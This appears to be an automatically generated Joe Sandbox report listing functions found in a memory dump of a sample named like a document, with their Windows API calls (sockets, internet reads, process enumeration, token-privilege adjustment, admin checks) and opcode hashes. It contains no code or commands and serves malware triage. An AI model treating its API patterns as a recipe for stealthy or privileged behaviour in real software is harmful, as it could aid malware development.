Function 007D1287 Relevance: 7.9, APIs: 5, Instructions: 379nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 007D19FA
GetSysColor.USER32(0000000F), ref: 007D1A4E
SetBkColor.GDI32(?,00000000), ref: 007D1A61

Part of subcall function 007D1290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 007D12D8

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ColorDialogNtdllProc_$LongWindow
String ID:
API String ID: 591255283-0
Opcode ID: 9e5ae42ad12c0344cab17585a7135860fe64bed20c1e3c4b5d7e5bca573bd675
Instruction ID: 78b844b2ae9e575c0474097ef60c6e12c43e9c4c31b3bf58d8d4bf2c128ca5b1
Opcode Fuzzy Hash: 9e5ae42ad12c0344cab17585a7135860fe64bed20c1e3c4b5d7e5bca573bd675
Instruction Fuzzy Hash: A2A159B1105594BEE628AB784C58D7F36BDFB82352B94411BF402E63D6DE1CDD01D2B2

Function 00846A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 008480A0: inet_addr.WS2_32(00000000), ref: 008480CB

socket.WS2_32(00000002,00000002,00000011), ref: 00846AB1
WSAGetLastError.WS2_32(00000000), ref: 00846ADA
bind.WS2_32(00000000,?,00000010), ref: 00846B13
WSAGetLastError.WS2_32(00000000), ref: 00846B20
closesocket.WS2_32(00000000), ref: 00846B34

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 6678c6d5e6ae3365e04547dd96823aef6f0a6553041b37fb3b12d97852f17ef2
Instruction ID: aeb0a1dbe0930aec7438a29af5d6e8e3f97602499d46f4b2cc66a0c4b5e23b90
Opcode Fuzzy Hash: 6678c6d5e6ae3365e04547dd96823aef6f0a6553041b37fb3b12d97852f17ef2
Instruction Fuzzy Hash: 1A419675600614EFEB10BF24DC8AF6E77B9EB45714F048059FA16AB3D2DA785D008792

Function 008555FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 0085564C
IsWindowEnabled.USER32 ref: 0085565A
GetForegroundWindow.USER32(?,?,00000001), ref: 00855667
IsIconic.USER32 ref: 00855675
IsZoomed.USER32 ref: 00855683

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: fe69739e1dd484256991e73052eedc1210544c01de48949c14a1b3d266902087
Instruction ID: dca10e6695ce9f2d0d91a674fd4707b73dd99e2645a98e189412309b68b85a82
Opcode Fuzzy Hash: fe69739e1dd484256991e73052eedc1210544c01de48949c14a1b3d266902087
Instruction Fuzzy Hash: ED11C8313006619FD7111F26DC68B6F77E9FF64723B814029FD06D7241DB349905CA95

Function 0084F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0084F151
Process32FirstW.KERNEL32(00000000,?), ref: 0084F15F

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

Process32NextW.KERNEL32(00000000,?), ref: 0084F21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0084F22E

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 6d9d32470fe3c899754fd00f7b5f54878af236dfd846d93a822e69642fad270c
Instruction ID: 8d297bd49111e62e49854af22b0440afc798d995b978cd5215df4a240b03d60c
Opcode Fuzzy Hash: 6d9d32470fe3c899754fd00f7b5f54878af236dfd846d93a822e69642fad270c
Instruction Fuzzy Hash: AE516B71504711AFD310EF24DC85A6BBBF8FF94710F10492EF595972A2EB74A908CB92

Function 0085C788 Relevance: 6.1, APIs: 4, Instructions: 83nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

GetCursorPos.USER32(?), ref: 0085C7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0080BBFB,?,?,?,?,?), ref: 0085C7D7
GetCursorPos.USER32(?), ref: 0085C824
NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0080BBFB,?,?,?), ref: 0085C85E

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
String ID:
API String ID: 1423138444-0
Opcode ID: f4492181859df72fee4e8eefec51f5ab9ec6077ac3212ca41be89420a653bd2f
Instruction ID: da6f150db1c219a227a27a67947bec8f7382b7541af29dcf9bd3ebadea5b5fbe
Opcode Fuzzy Hash: f4492181859df72fee4e8eefec51f5ab9ec6077ac3212ca41be89420a653bd2f
Instruction Fuzzy Hash: A731A039600218AFCB15DF58C898EEA7BB6FB49312F0440A9FD05CB262D7359D65DFA0

Function 008340B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 008340D1
_memset.LIBCMT ref: 008340F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00834144
CloseHandle.KERNEL32(00000000), ref: 0083414D

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 7ef4eea3b0b6d1d22f82c91fb2bcba7492b460f404c37e3ff375de6d50a282c4
Instruction ID: ba57dd1827bd4741215c370898decf4898dd751f27f41b0b5a831db6eb18f0de
Opcode Fuzzy Hash: 7ef4eea3b0b6d1d22f82c91fb2bcba7492b460f404c37e3ff375de6d50a282c4
Instruction Fuzzy Hash: 1111AB7590132C7AD7305BA59C4DFABBB7CEF85760F104196F908D7190D6745E808BA4

Function 007D1290 Relevance: 6.1, APIs: 4, Instructions: 59nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 007D12D8
GetClientRect.USER32(?,?), ref: 0080B84B
GetCursorPos.USER32(?), ref: 0080B855
ScreenToClient.USER32(?,?), ref: 0080B860

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
String ID:
API String ID: 1010295502-0
Opcode ID: fbd2e6e3ec307971396dc49b73fef7f5516f4f229bdb9215b9157f81246e9b28
Instruction ID: dde1ab276059bb75e1fd835c07d3d33c1de547948f05fdcced7b919a4d4db575
Opcode Fuzzy Hash: fbd2e6e3ec307971396dc49b73fef7f5516f4f229bdb9215b9157f81246e9b28
Instruction Fuzzy Hash: D7115536A00119FBCB00EFA8D8899AE77B9FB05301F404466FA01E3251D739BA55CBA5

Function 0082EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0082EB19

Strings

(, xrefs: 0082EB5F
|, xrefs: 0082EB49

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 30d6c5f8e86850b191e6a0d70601078cd8a47cca29631396667a9a2d845536ac
Instruction ID: df05799495331153c1c98b763e7cd67a0a0e22b22e4c783d8376cdc82dd9a1f2
Opcode Fuzzy Hash: 30d6c5f8e86850b191e6a0d70601078cd8a47cca29631396667a9a2d845536ac
Instruction Fuzzy Hash: 61324775A00615DFCB28CF19D48096AB7F0FF48320B15C56EE99ADB3A2DB70E981CB44

Function 008425E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 008426D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0084270C

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 737600d8201eda101dc51de1e55c3e476389b1bfa99fd009c232e320e927ff96
Instruction ID: cbd02319dd2283d24cf587eac4706d06497bba52021211b4f12ef9ac01aa7e25
Opcode Fuzzy Hash: 737600d8201eda101dc51de1e55c3e476389b1bfa99fd009c232e320e927ff96
Instruction Fuzzy Hash: 1A41D37160830DFFEB20DA94CC85EBBB7BCFB50728F50406AF601E6241EA759E419764

Function 0083B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0083B5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0083B608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0083B655

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: b5078415951724c37b7757c3a033906c5a5e74c2dfe9a53f0dc2f74e0401a2d3
Instruction ID: c32387cc5bdfe428d3b43fcb19f92d7e9b9e46afeb889f00ef8178c507ab9a6e
Opcode Fuzzy Hash: b5078415951724c37b7757c3a033906c5a5e74c2dfe9a53f0dc2f74e0401a2d3
Instruction Fuzzy Hash: 4721A475A00618EFCB00EF55D884EEDBBB8FF88310F0480AAE905EB351DB35A915CB51

Function 00828CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 007F0FF6: std::exception::exception.LIBCMT ref: 007F102C
Part of subcall function 007F0FF6: __CxxThrowException@8.LIBCMT ref: 007F1041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00828D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00828D3A
GetLastError.KERNEL32 ref: 00828D47

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: fa1db15a1bdacef22d8824a0001e21e116fc344291b16cf9213d7c7be55b8888
Instruction ID: 57525603ade3f1fb9e05eef372d471431caa07a19addab5e6f5992b5819eb4a8
Opcode Fuzzy Hash: fa1db15a1bdacef22d8824a0001e21e116fc344291b16cf9213d7c7be55b8888
Instruction Fuzzy Hash: 76118FB1514309EFE728AF54EC89D6BB7FCFB44711B24852EF55693682EB34AC408A60

Function 00834C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00834C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00834C43
FreeSid.ADVAPI32(?), ref: 00834C53

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 577ab97f084c799b7ad244704c627263ca35ca461b9a4871b0caaac5d5f7e103
Instruction ID: bdb62a57aeeff4cd91cc76fe3b2b4646289bb5db55c47f614b8a3a68cf179ee3
Opcode Fuzzy Hash: 577ab97f084c799b7ad244704c627263ca35ca461b9a4871b0caaac5d5f7e103
Instruction Fuzzy Hash: 3AF0FF7595130DBFDF04DFF4DD89AAEB7BCFF08212F5044A9A601E2182D7756A448B50

Function 007DE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f134ffe3e549eb22d02a6011a4d51e3748fbd60c9e1bd45be1b3c807a8258e8
Instruction ID: f6a48de0b66c633e3242dd455237f5e658dda5c5047477bcdd83160b91b56ef8
Opcode Fuzzy Hash: 7f134ffe3e549eb22d02a6011a4d51e3748fbd60c9e1bd45be1b3c807a8258e8
Instruction Fuzzy Hash: 0222AE74A0021ADFDB25EF54C884ABEB7F4FF04310F14816AE956AF341E739A985CB91

Function 007D16DE Relevance: 3.1, APIs: 2, Instructions: 83nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

Part of subcall function 007D25DB: GetWindowLongW.USER32(?,000000EB), ref: 007D25EC

GetParent.USER32(?), ref: 0080BA0A
NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,007D19B3,?,?,?,00000006,?), ref: 0080BA84

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: LongWindow$DialogNtdllParentProc_
String ID:
API String ID: 314495775-0
Opcode ID: ae99337332ff344d56298879060595e194587efec7120087057ed4a49dc0793a
Instruction ID: d059e66a0ed4d85c1b63cb0b52a70984d30df0caa1f937b2cac5f9cfd4e4de08
Opcode Fuzzy Hash: ae99337332ff344d56298879060595e194587efec7120087057ed4a49dc0793a
Instruction Fuzzy Hash: FA216F34201114BFCB209B68CC88DA93BA6FF49374F584256F6259B3F2D7359D529B50

Function 0083C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0083C966
FindClose.KERNEL32(00000000), ref: 0083C996

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 97356c1a0ea4c8486b14f865f119b90b55548769d25ca850b367bf25fb2af3da
Instruction ID: 509f99358cfc7b23c5db992a842b7568c0fa7f1a88accf8853bfe97549f3887e
Opcode Fuzzy Hash: 97356c1a0ea4c8486b14f865f119b90b55548769d25ca850b367bf25fb2af3da
Instruction Fuzzy Hash: D31165726106149FD710EF29D849A6AF7E9FF84325F01851EF9A5D7391DB34AC00CB81

Function 0085C86D Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0080BB8A,?,?,?), ref: 0085C8E1

Part of subcall function 007D25DB: GetWindowLongW.USER32(?,000000EB), ref: 007D25EC

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0085C8C7

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: LongWindow$DialogMessageNtdllProc_Send
String ID:
API String ID: 1273190321-0
Opcode ID: 87ef92138411c58484d5e63f1b67256665f3348f976f2cc329e9f6895cdde3e1
Instruction ID: 0e4462ec9906a0722325f23e44d9ddc450f2d48af629219ea7b68346b81eb414
Opcode Fuzzy Hash: 87ef92138411c58484d5e63f1b67256665f3348f976f2cc329e9f6895cdde3e1
Instruction Fuzzy Hash: B401B531200304AFCB216F14DC44E663BB6FB85366F180175FD519B2A1C7319816EB91

Function 0085CC2E Relevance: 3.0, APIs: 2, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0085CC51
